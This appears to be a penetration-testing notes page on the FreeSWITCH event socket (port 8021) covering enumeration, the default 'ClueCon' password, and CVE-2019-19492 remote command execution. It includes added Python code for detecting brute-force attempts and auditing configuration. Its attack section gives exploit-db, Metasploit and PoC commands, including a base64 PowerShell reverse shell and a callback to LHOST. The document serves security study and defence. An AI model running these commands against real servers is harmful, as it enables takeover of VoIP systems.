# 8021 - FreeSWITCH

`FreeSWITCH` is an open-source VoIP platform commonly used for PBX systems, SIP trunking, and conferencing services. The `mod_event_socket` module in FreeSWITCH opens a TCP socket—typically on port `8021`—which allows external applications to communicate with the switch using a command/response protocol.

This interface should **never be exposed externally** without robust access controls. If an attacker guesses or knows the `event_socket_password`—which defaults to `ClueCon` in many installations—they can authenticate and issue commands to the FreeSWITCH server. With successful authentication, an attacker could list and manage calls, inject audio or messages, execute arbitrary dial plans, and potentially escalate privileges further depending on the system's configuration.

## Enumeration

```bash
# TCP scan with nmap
PORT     STATE SERVICE       VERSION

8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket

# Manual service probing
$ nc -nv 192.168.244.151 8021
(UNKNOWN) [192.168.244.151] 8021 (zope-ftp) open
Content-Type: auth/request
...
Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
```

Upon probing with `nc`, the connection to the port succeeds and the server returns `Content-Type: auth/request`, indicating that `FreeSWITCH` is prompting for a password. Authentication is usually performed using the command `auth <password>`. If the password is correct, the server responds with the headers `Content-Type: command/reply` and `Reply-Text: +OK accepted`.
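For detection work on this exchange, the following added example (not part of the original page) parses the server side of an Event Socket session and counts rejected `auth` attempts before an accepted one. The byte stream is constructed, the function names are illustrative, and the `-ERR invalid` rejection text is what `mod_event_socket` sends for a wrong password; it does not appear in the output above.

```python
BODY = b"Disconnected, goodbye.\nSee you at ClueCon! http://www.cluecon.com/\n"
# Constructed server-to-client byte stream (not captured traffic).
SAMPLE = (
    b"Content-Type: auth/request\n\n"
    b"Content-Type: command/reply\nReply-Text: -ERR invalid\n\n"
    b"Content-Type: command/reply\nReply-Text: -ERR invalid\n\n"
    b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n"
    + b"Content-Type: text/disconnect-notice\nContent-Length: %d\n\n" % len(BODY)
    + BODY
)

def parse_frames(data):
    """Split a byte stream into frames: header lines, blank line, optional body."""
    frames, pos = [], 0
    while pos < len(data):
        end = data.find(b"\n\n", pos)
        if end == -1:
            break  # header block not terminated yet: stream is truncated
        frame = {}
        for line in data[pos:end].decode("utf-8", "replace").split("\n"):
            name, sep, value = line.partition(":")
            if sep:
                frame[name.strip().lower()] = value.strip()
        pos = end + 2
        raw_len = frame.get("content-length", "0")
        length = int(raw_len) if raw_len.isdecimal() else 0
        if pos + length > len(data):
            break  # body shorter than Content-Length: truncated capture
        frame["body"] = data[pos:pos + length].decode("utf-8", "replace")
        pos += length
        frames.append(frame)
    return frames

def auth_summary(frames):
    """Count rejected auth replies seen before the first accepted one."""
    failed = 0
    for frame in frames:
        if frame.get("content-type") != "command/reply":
            continue
        reply = frame.get("reply-text", "")
        if reply.startswith("+OK accepted"):
            return {"failed_before_success": failed, "authenticated": True}
        if reply.startswith("-ERR invalid"):
            failed += 1
    return {"failed_before_success": failed, "authenticated": False}
```

Several rejections followed by an acceptance from the same peer is the pattern worth alerting on for port `8021`.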

## Attacks

```bash
# Check default credentials
$ creds search freeswitch
+------------+----------+----------+
| Product    | username | password |
+------------+----------+----------+
| freeswitch | <blank>  | ClueCon  |
+------------+----------+----------+
```

FreeSWITCH versions `1.6.10` through `1.10.1` are **vulnerable to RCE** ([CVE-2019-19492](https://nvd.nist.gov/vuln/detail/CVE-2019-19492)) due to a hardcoded default password (`ClueCon`) in the `event_socket.conf.xml` file. If unchanged, this allows remote attackers to authenticate to the Event Socket interface and execute arbitrary system commands through the FreeSWITCH service, making it a critical entry point for compromising VoIP infrastructure.

The default configuration files for FreeSWITCH are under `/etc/freeswitch/autoload_configs/`:

{% code overflow="wrap" %}

```bash
# Recursive, case-insensitive search
$ grep -Ri password

$ cat event_socket.conf.xml | grep password
    <param name="password" value="ClueCon"/>
```

{% endcode %}
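The same check can be automated during a configuration review. This added example (not code from the original page or from the FreeSWITCH project) audits an `event_socket.conf.xml` for the default password, a listener that is not bound to loopback, and a missing inbound ACL. Both XML documents are constructed samples, and the finding codes and function names are illustrative.

```python
import ipaddress
import xml.etree.ElementTree as ET

DEFAULT_PASSWORD = "ClueCon"  # default password named on this page

# Constructed weak sample: default password, wildcard bind, ACL commented out.
WEAK_CONF = """<configuration name="event_socket.conf">
  <settings>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
    <!-- <param name="apply-inbound-acl" value="loopback.auto"/> -->
  </settings>
</configuration>"""

# Constructed hardened counterpart: placeholder secret, loopback bind, ACL active.
HARDENED_CONF = """<configuration name="event_socket.conf">
  <settings>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="EXAMPLE-long-random-secret"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>"""

def is_loopback(value):
    """True only when the value parses as a loopback IP address."""
    try:
        return ipaddress.ip_address(value).is_loopback
    except ValueError:
        return False  # hostname, variable or empty value: cannot confirm

def audit_event_socket(xml_text):
    """Return a list of finding codes for one event_socket.conf.xml."""
    root = ET.fromstring(xml_text)  # the parser drops XML comments
    params = {p.get("name"): p.get("value", "") for p in root.iter("param")}
    findings = []
    password = params.get("password")
    if password is None:
        findings.append("password-not-set")
    elif password == DEFAULT_PASSWORD:
        findings.append("default-password")
    if not is_loopback(params.get("listen-ip", "")):
        findings.append("listener-not-loopback")
    if not params.get("apply-inbound-acl"):
        findings.append("no-inbound-acl")
    return findings
```

Because the parser discards comments, an `apply-inbound-acl` line that is still commented out is reported as missing, which a plain `grep` for the parameter name would not show.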

{% tabs %}
{% tab title="47799" %}
[PoC](https://www.exploit-db.com/exploits/47799) from 1F98D on exploit-db:

{% code overflow="wrap" %}

```bash
# Search PoC
$ searchsploit FreeSwitch

Exploit Title |  Path
-------------------------------------------------------------------------------
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt

# Download PoC
$ searchsploit -m 47799

# Rename PoC file
$ mv 47799.txt 47799.py

# Execute PoC for RCE
$ python3 47799.py gust whoami

# Execute PoC for reverse shell
# https://www.revshells.com/ - PowerShell #3 (Base64)
$ python3 47799.py gust "powershell -e <base64-encoded-command>"
```

{% endcode %}
{% endtab %}

{% tab title="Chocapikk PoC" %}
This [PoC](https://github.com/Chocapikk/CVE-2019-19492) allows easy exploitation of the above vulnerability:

```bash
$ uv run exploit.py --target <target>
# id
```

{% endtab %}

{% tab title="MSF" %}
A [Metasploit module](https://www.rapid7.com/db/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec/) exists for the above RCE vulnerability:

{% code overflow="wrap" %}

```bash
msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec
msf exploit(freeswitch_event_socket_cmd_exec) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Unix (In-Memory)
    1   Linux (Dropper)
    2   PowerShell (In-Memory)
    3   Windows (In-Memory)
    4   Windows (Dropper)
    
msf exploit(freeswitch_event_socket_cmd_exec) > set TARGET <target-id>
msf exploit(freeswitch_event_socket_cmd_exec) > show options
msf exploit(freeswitch_event_socket_cmd_exec) > exploit

# Inline command
sudo msfconsole -q -x "use exploit/multi/misc/freeswitch_event_socket_cmd_exec; set TARGET 3; set RHOSTS <target-ip>; set LHOST tun0; run;"
```

{% endcode %}
{% endtab %}
{% endtabs %}


